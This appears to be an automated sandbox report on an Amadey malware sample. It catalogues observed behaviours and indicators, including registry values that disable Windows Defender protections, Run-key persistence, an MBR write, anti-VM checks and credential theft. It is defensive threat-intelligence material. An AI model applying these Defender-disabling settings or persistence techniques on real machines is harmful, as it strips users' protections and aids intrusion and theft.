amadey | 45c7ff8e9ea76d1c1d91bb4b6f9ca3ad9dbb2707122c32e68d1d199d5beb189e

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	9220b9dffd.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	9220b9dffd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	9220b9dffd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	9220b9dffd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	9220b9dffd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	9220b9dffd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	9220b9dffd.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	9220b9dffd.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	9220b9dffd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	9220b9dffd.exe

Modifies security service 2 TTPs 2 IoCs

Modify Registry

Windows Service

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/5680-2526-0x00000000087E0000-0x0000000008934000-memory.dmp	family_quasar
behavioral1/memory/5680-2527-0x0000000008970000-0x000000000898A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4924 created 2640	4924	MSBuild.exe	44

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2y1617.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	23da5e6bb9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ad3a6208a1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	29043e627c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a0314adca1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1Q30C9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d0249e62d5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9220b9dffd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	91c4598add.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
268	5680	powershell.exe
446	5680	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
740	powershell.exe
7144	powershell.exe
5680	powershell.exe
6872	powershell.exe
7836	powershell.exe
6760	powershell.exe
12488	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 21 IoCs

flow	pid	Process
293	6712	svchost.exe
290	5056	rapes.exe
188	5056	rapes.exe
188	5056	rapes.exe
188	5056	rapes.exe
237	5056	rapes.exe
323	5056	rapes.exe
33	5056	rapes.exe
33	5056	rapes.exe
33	5056	rapes.exe
33	5056	rapes.exe
33	5056	rapes.exe
33	5056	rapes.exe
33	5056	rapes.exe
33	5056	rapes.exe
33	5056	rapes.exe
33	5056	rapes.exe
189	5028	svchost015.exe
193	1632	svchost015.exe
257	5056	rapes.exe
257	5056	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3132	takeown.exe
5724	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

credential_access stealer

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\3QNjYQu_2516\ImagePath = "\\??\\C:\\Windows\\Temp\\3QNjYQu_2516.sys"	tzutil.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
7148	msedge.exe
7212	msedge.exe
7536	msedge.exe
6200	msedge.exe
2820	chrome.exe
1628	chrome.exe
6188	chrome.exe
7960	chrome.exe

Checks BIOS information in registry 2 TTPs 28 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	23da5e6bb9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d0249e62d5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2039335369.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2039335369.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a0314adca1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a0314adca1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1Q30C9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	29043e627c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	91c4598add.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	23da5e6bb9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ad3a6208a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9220b9dffd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	91c4598add.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1Q30C9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2y1617.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ad3a6208a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	29043e627c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d0249e62d5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9220b9dffd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2y1617.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	1Q30C9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	261.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Deletes itself 1 IoCs

pid	Process
7028	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c896ff49.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c896ff49.cmd	powershell.exe

Executes dropped EXE 36 IoCs

pid	Process
1748	G4l05.exe
2352	1Q30C9.exe
5056	rapes.exe
2036	2y1617.exe
5472	apple.exe
1808	261.exe
1912	261.exe
2924	rapes.exe
1164	23da5e6bb9.exe
4124	3sZiUQa.exe
4464	ad3a6208a1.exe
5028	svchost015.exe
1700	29043e627c.exe
1632	svchost015.exe
1056	d0249e62d5.exe
5852	2039335369.exe
1724	4760908696.exe
2332	9220b9dffd.exe
5092	ca8acd6286.exe
5008	rapes.exe
5200	3514bb24fc.exe
6368	3sZiUQa.exe
6576	91c4598add.exe
6796	h8NlU62.exe
724	XOPPRUc.exe
3744	7IIl2eE.exe
8096	captcha.exe
4836	Passwords.com
8092	a0314adca1.exe
5816	TbV75ZR.exe
5812	qWR3lUj.exe
1964	rapes.exe
4576	p3hx1_003.exe
2516	tzutil.exe
7028	w32tm.exe
4264	Rm3cVPI.exe

Identifies Wine through registry keys 2 TTPs 13 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	1Q30C9.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	ad3a6208a1.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	d0249e62d5.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	9220b9dffd.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	91c4598add.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	2y1617.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	23da5e6bb9.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	29043e627c.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	a0314adca1.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3132	takeown.exe
5724	icacls.exe

Reads ssh keys stored on the system 2 TTPs
Tries to access SSH used by SSH programs.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	9220b9dffd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	9220b9dffd.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d0249e62d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416990101\\d0249e62d5.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2039335369.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10417000101\\2039335369.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4760908696.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10417010101\\4760908696.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9220b9dffd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10417020101\\9220b9dffd.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	G4l05.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	captcha.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	91c4598add.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000c000000024267-204.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 22 IoCs

discovery

Process Discovery

T1057

pid	Process
7276	tasklist.exe
4404	tasklist.exe
6188	tasklist.exe
7192	tasklist.exe
7576	tasklist.exe
6892	tasklist.exe
3604	tasklist.exe
3812	tasklist.exe
5012	tasklist.exe
7900	tasklist.exe
3480	tasklist.exe
5840	tasklist.exe
4800	tasklist.exe
2412	tasklist.exe
7996	tasklist.exe
6232	tasklist.exe
6028	tasklist.exe
6452	tasklist.exe
6760	tasklist.exe
6992	tasklist.exe
7524	tasklist.exe
6220	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
2352	1Q30C9.exe
5056	rapes.exe
2036	2y1617.exe
2924	rapes.exe
1164	23da5e6bb9.exe
4464	ad3a6208a1.exe
1700	29043e627c.exe
1056	d0249e62d5.exe
2332	9220b9dffd.exe
5008	rapes.exe
6576	91c4598add.exe
8092	a0314adca1.exe
1964	rapes.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 4464 set thread context of 5028	4464	ad3a6208a1.exe	183
PID 1700 set thread context of 1632	1700	29043e627c.exe	193
PID 5092 set thread context of 5368	5092	ca8acd6286.exe	221
PID 6796 set thread context of 6820	6796	h8NlU62.exe	229
PID 724 set thread context of 5560	724	XOPPRUc.exe	232
PID 5816 set thread context of 4924	5816	TbV75ZR.exe	402
PID 5812 set thread context of 2416	5812	qWR3lUj.exe	414

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	1Q30C9.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

Ignore Process Interrupts

T1564.011

pid	Process
7144	powershell.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1768	sc.exe
1452	sc.exe
5960	sc.exe
5464	sc.exe
4828	sc.exe
5088	sc.exe
3628	sc.exe
1960	sc.exe
2584	sc.exe
4288	sc.exe
3896	sc.exe
2780	sc.exe
3496	sc.exe
2676	sc.exe
5228	sc.exe
3304	sc.exe
3068	sc.exe
3904	sc.exe
664	sc.exe
5192	sc.exe
2380	sc.exe
5804	sc.exe
6072	sc.exe
6112	sc.exe
1236	sc.exe
4208	sc.exe
5532	sc.exe
6084	sc.exe
2332	sc.exe
396	sc.exe
4284	sc.exe
1172	sc.exe
2416	sc.exe
2540	sc.exe
2112	sc.exe
1576	sc.exe
5484	sc.exe
2592	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5692	4924	WerFault.exe	402

System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	23da5e6bb9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	29043e627c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	91c4598add.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d0249e62d5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	p3hx1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4760908696.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	4760908696.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a0314adca1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	G4l05.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ad3a6208a1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3514bb24fc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2y1617.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	4760908696.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9220b9dffd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1Q30C9.exe

Checks processor information in registry 2 TTPs 26 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	2039335369.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	2039335369.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
